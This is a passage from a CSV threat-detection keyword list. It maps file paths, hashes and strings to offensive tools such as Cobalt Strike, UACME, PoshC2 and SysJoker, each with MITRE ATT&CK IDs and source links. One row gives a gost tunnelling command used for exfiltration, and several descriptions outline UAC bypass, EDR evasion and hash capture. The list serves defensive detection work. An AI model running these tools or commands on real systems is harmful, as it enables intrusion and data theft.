-*C:\ProgramData\SystemData\microsoft_Windows.dll*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*C:\Temp\file.exe*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*C:\Temp\poc.txt*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,0,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*c:\temp\something.ps1*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*C:\temp\tmp.tmp*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*C:\Uac\results.cab*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,0,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*C:\Users\*\AppData\Roaming\Indexing.*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*C:\Users\*\AppData\Roaming\svchost.exe*,offensive_tool_keyword,chaos,Chaos ransomware behavior,T1486,TA0040,chaos ransomware,N/A,Ransomware,https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*C:\Users\Public\*.dmp*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*c:\users\public\creds.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*c:\users\public\output.txt*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*C:\Users\Public\perm.txt*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*C:\Users\Public\test.txt*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*C:\Windows\DirectX.log*\Windows\Temp\backup.log*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,0,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*C:\Windows\MEMORY.DMP*,greyware_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*C:\Windows\Temp\move.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*C:\Windows\Temp\moveme.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*c:\windows\temp\test.tmp farmer*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*C??/generator.cpp*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*c1090dbc-f2f7-4d90-a241-86e0c0217786*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*C2 Client*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*C2 Framework for villains*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*C2 Nimplant Server*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*C2 Server*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*C2.KillDate*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*c2.striker.*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*C2.UserAgent*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*C2/C2Server.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*C2_RPC_functions.py*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*c2_server*.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*c2_server.resources*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*C2_Server-main*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*c2_service.sh*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*C2concealer -*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*C2concealer-master*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,1,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*'C2Default'*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*c2endpoint.php*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*c2hlbGxjb2Rl*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*c2lint *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*C2ListenerPort*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*c2-logs.txt*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*c2profile.profile*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*C2ProfileManager.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*C2ProfileResponse.cs*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*-c2-randomizer.py*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*C2ReverseClint*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*C2ReverseProxy*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*C2ReverseServer*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 